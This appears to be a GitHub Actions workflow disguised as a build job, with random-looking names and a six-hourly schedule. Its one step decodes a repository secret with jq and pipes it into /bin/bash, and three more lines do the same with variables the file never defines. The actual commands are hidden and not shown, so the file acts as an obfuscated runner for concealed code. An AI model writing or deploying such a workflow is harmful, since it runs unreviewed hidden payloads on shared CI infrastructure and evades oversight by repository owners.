name: jiangneihe3765
on:
  workflow_dispatch:
  schedule:
    - cron: '10 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiangneihe3765
        env:
          hb68409: ${{ secrets.hb68409 }}
        run: |
          echo $hb68409 | jq -r .c970 | /bin/bash
          echo $nbk30 | jq -r .ts1 | /bin/bash
          echo $bd91 | jq -r .rronk59961 | /bin/bash
          echo $aor9 | jq -r .f55 | /bin/bash

